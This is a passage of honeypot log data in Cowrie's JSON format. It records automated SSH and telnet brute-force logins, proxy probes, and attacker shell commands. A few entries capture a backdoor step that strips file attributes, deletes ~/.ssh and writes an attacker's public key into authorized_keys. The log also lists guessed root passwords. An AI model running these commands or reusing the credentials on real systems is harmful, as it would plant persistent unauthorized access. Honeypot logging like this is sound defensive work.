 client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:09:13.525899Z","src_ip":"212.227.235.229","session":"09ba58e564e2"}
{"eventid":"cowrie.login.success","username":"root","password":"!Qq123456","message":"login attempt [root/!Qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:09:14.150190Z","src_ip":"212.227.235.229","session":"09ba58e564e2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:09:14.463798Z","src_ip":"212.227.235.229","session":"09ba58e564e2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T15:09:14.496267Z","src_ip":"212.227.235.229","session":"09ba58e564e2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T15:09:14.497380Z","src_ip":"212.227.235.229","session":"09ba58e564e2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:09:14.646121Z","src_ip":"212.227.235.229","session":"09ba58e564e2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:09:14.958076Z","src_ip":"212.227.235.229","session":"09ba58e564e2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T15:09:14.958913Z","src_ip":"212.227.235.229","session":"09ba58e564e2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T15:09:15.108512Z","src_ip":"212.227.235.229","session":"09ba58e564e2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:09:15.109477Z","src_ip":"212.227.235.229","session":"09ba58e564e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34792,"dst_ip":"1.2.3.4","dst_port":22,"session":"e89988a94e1f","protocol":"ssh","message":"New connection: 212.227.235.229:34792 (1.2.3.4:22) [session: e89988a94e1f]","sensor":"my-vps","timestamp":"2025-08-26T15:09:15.249733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:09:15.250506Z","src_ip":"212.227.235.229","session":"e89988a94e1f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:09:15.393428Z","src_ip":"212.227.235.229","session":"e89988a94e1f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T15:09:16.007929Z","src_ip":"212.227.235.229","session":"e89988a94e1f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:09:17.153880Z","src_ip":"212.227.235.229","session":"e89988a94e1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34796,"dst_ip":"1.2.3.4","dst_port":22,"session":"8396ce37a735","protocol":"ssh","message":"New connection: 212.227.235.229:34796 (1.2.3.4:22) [session: 8396ce37a735]","sensor":"my-vps","timestamp":"2025-08-26T15:09:17.323418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:09:17.324287Z","src_ip":"212.227.235.229","session":"8396ce37a735"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:09:17.484811Z","src_ip":"212.227.235.229","session":"8396ce37a735"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:09:18.149336Z","src_ip":"212.227.235.229","session":"8396ce37a735"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:09:18.298020Z","src_ip":"212.227.235.229","session":"09ba58e564e2"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:09:18.309435Z","src_ip":"212.227.235.229","session":"8396ce37a735"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37034,"dst_ip":"1.2.3.4","dst_port":23,"session":"25e5dc57cbfe","protocol":"telnet","message":"New connection: 212.227.125.160:37034 (1.2.3.4:23) [session: 25e5dc57cbfe]","sensor":"my-vps","timestamp":"2025-08-26T15:09:19.203518Z"}
{"eventid":"cowrie.session.closed","duration":30.62813448905945,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:09:34.356128Z","src_ip":"212.227.125.160","session":"5546a857beb6"}
{"eventid":"cowrie.session.closed","duration":31.136842250823975,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:09:43.196912Z","src_ip":"212.227.125.160","session":"55487357dc06"}
{"eventid":"cowrie.session.closed","duration":31.206791400909424,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:09:50.410210Z","src_ip":"212.227.125.160","session":"25e5dc57cbfe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34986,"dst_ip":"1.2.3.4","dst_port":23,"session":"e3536a6cdeb7","protocol":"telnet","message":"New connection: 212.227.125.160:34986 (1.2.3.4:23) [session: e3536a6cdeb7]","sensor":"my-vps","timestamp":"2025-08-26T15:10:18.808303Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:10:18.893949Z","src_ip":"212.227.125.160","session":"e3536a6cdeb7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:10:18.952215Z","src_ip":"212.227.125.160","session":"e3536a6cdeb7"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T15:10:18.953506Z","src_ip":"212.227.125.160","session":"e3536a6cdeb7"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T15:10:18.954247Z","src_ip":"212.227.125.160","session":"e3536a6cdeb7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55906,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9d5ee439bc0","protocol":"ssh","message":"New connection: 217.72.205.35:55906 (1.2.3.4:22) [session: e9d5ee439bc0]","sensor":"my-vps","timestamp":"2025-08-26T15:10:20.878311Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:10:20.879477Z","src_ip":"217.72.205.35","session":"e9d5ee439bc0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":29368,"dst_ip":"1.2.3.4","dst_port":22,"session":"0146b2f0b981","protocol":"ssh","message":"New connection: 213.209.150.239:29368 (1.2.3.4:22) [session: 0146b2f0b981]","sensor":"my-vps","timestamp":"2025-08-26T15:10:29.752576Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:10:29.753392Z","src_ip":"213.209.150.239","session":"0146b2f0b981"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T15:10:29.801635Z","src_ip":"213.209.150.239","session":"0146b2f0b981"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:10:30.034955Z","src_ip":"213.209.150.239","session":"0146b2f0b981"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":31537,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:31537","sensor":"my-vps","timestamp":"2025-08-26T15:10:30.083045Z","session":"0146b2f0b981"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T15:10:30.130224Z","src_ip":"213.209.150.239","session":"0146b2f0b981"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":14341,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:14341","sensor":"my-vps","timestamp":"2025-08-26T15:10:30.265440Z","session":"0146b2f0b981"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T15:10:30.312465Z","src_ip":"213.209.150.239","session":"0146b2f0b981"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:10:30.360432Z","src_ip":"213.209.150.239","session":"0146b2f0b981"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58292,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8ea07a0bc9c","protocol":"ssh","message":"New connection: 212.227.235.229:58292 (1.2.3.4:22) [session: a8ea07a0bc9c]","sensor":"my-vps","timestamp":"2025-08-26T15:10:35.412551Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-26T15:10:35.414968Z","src_ip":"212.227.235.229","session":"a8ea07a0bc9c"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-26T15:10:35.692983Z","src_ip":"212.227.235.229","session":"a8ea07a0bc9c"}
{"eventid":"cowrie.login.success","username":"root","password":"monkey123","message":"login attempt [root/monkey123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:10:37.602731Z","src_ip":"212.227.235.229","session":"a8ea07a0bc9c"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":56550,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc0fa634e13b","protocol":"ssh","message":"New connection: 139.19.117.131:56550 (1.2.3.4:22) [session: fc0fa634e13b]","sensor":"my-vps","timestamp":"2025-08-26T15:12:19.040725Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:12:19.041606Z","src_ip":"139.19.117.131","session":"fc0fa634e13b"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T15:12:19.059115Z","src_ip":"139.19.117.131","session":"fc0fa634e13b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"15:e7:87:ad:f3:82:5d:50:07:04:ac:28:fb:1d:25:a4","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCEoVHIUiKBWdT0hU2B8GNkqXZAbPoADj3xh+da2pnk4uuhdoM5SIIZ2/Lh/MG1gogomxGFuTDhslSNvJcFwRauaYPek1l3Nix2HWEjzfD1PZykb9z1ojqx1oa4OmODHKoujsBbaz53KxsZGRr4mIesdAfVFl6aEs4N2Q03h2kCV0Lb2rhoMSjnU7tSHMJdRMX1gGwyXZkNWqj5X9I+dqq4LXFVCV0E5pNsHJbZq+r3JaxudORI0TJU5g5HRWA7vas157jgXs7KMITBypdKGtxWCTDRpi8jBLj7C4HfroP3BQW/EFN01w7EmWJoc9iQ6OKSrjsnYaj0Q6bwrgJsZYMl","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 15:e7:87:ad:f3:82:5d:50:07:04:ac:28:fb:1d:25:a4","sensor":"my-vps","timestamp":"2025-08-26T15:12:19.096323Z","src_ip":"139.19.117.131","session":"fc0fa634e13b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"15:e7:87:ad:f3:82:5d:50:07:04:ac:28:fb:1d:25:a4","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCEoVHIUiKBWdT0hU2B8GNkqXZAbPoADj3xh+da2pnk4uuhdoM5SIIZ2/Lh/MG1gogomxGFuTDhslSNvJcFwRauaYPek1l3Nix2HWEjzfD1PZykb9z1ojqx1oa4OmODHKoujsBbaz53KxsZGRr4mIesdAfVFl6aEs4N2Q03h2kCV0Lb2rhoMSjnU7tSHMJdRMX1gGwyXZkNWqj5X9I+dqq4LXFVCV0E5pNsHJbZq+r3JaxudORI0TJU5g5HRWA7vas157jgXs7KMITBypdKGtxWCTDRpi8jBLj7C4HfroP3BQW/EFN01w7EmWJoc9iQ6OKSrjsnYaj0Q6bwrgJsZYMl","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T15:12:19.097090Z","src_ip":"139.19.117.131","session":"fc0fa634e13b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"15:e7:87:ad:f3:82:5d:50:07:04:ac:28:fb:1d:25:a4","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCEoVHIUiKBWdT0hU2B8GNkqXZAbPoADj3xh+da2pnk4uuhdoM5SIIZ2/Lh/MG1gogomxGFuTDhslSNvJcFwRauaYPek1l3Nix2HWEjzfD1PZykb9z1ojqx1oa4OmODHKoujsBbaz53KxsZGRr4mIesdAfVFl6aEs4N2Q03h2kCV0Lb2rhoMSjnU7tSHMJdRMX1gGwyXZkNWqj5X9I+dqq4LXFVCV0E5pNsHJbZq+r3JaxudORI0TJU5g5HRWA7vas157jgXs7KMITBypdKGtxWCTDRpi8jBLj7C4HfroP3BQW/EFN01w7EmWJoc9iQ6OKSrjsnYaj0Q6bwrgJsZYMl","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 15:e7:87:ad:f3:82:5d:50:07:04:ac:28:fb:1d:25:a4","sensor":"my-vps","timestamp":"2025-08-26T15:12:19.117534Z","src_ip":"139.19.117.131","session":"fc0fa634e13b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"15:e7:87:ad:f3:82:5d:50:07:04:ac:28:fb:1d:25:a4","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCEoVHIUiKBWdT0hU2B8GNkqXZAbPoADj3xh+da2pnk4uuhdoM5SIIZ2/Lh/MG1gogomxGFuTDhslSNvJcFwRauaYPek1l3Nix2HWEjzfD1PZykb9z1ojqx1oa4OmODHKoujsBbaz53KxsZGRr4mIesdAfVFl6aEs4N2Q03h2kCV0Lb2rhoMSjnU7tSHMJdRMX1gGwyXZkNWqj5X9I+dqq4LXFVCV0E5pNsHJbZq+r3JaxudORI0TJU5g5HRWA7vas157jgXs7KMITBypdKGtxWCTDRpi8jBLj7C4HfroP3BQW/EFN01w7EmWJoc9iQ6OKSrjsnYaj0Q6bwrgJsZYMl","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T15:12:19.118450Z","src_ip":"139.19.117.131","session":"fc0fa634e13b"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:12:29.040766Z","src_ip":"139.19.117.131","session":"fc0fa634e13b"}
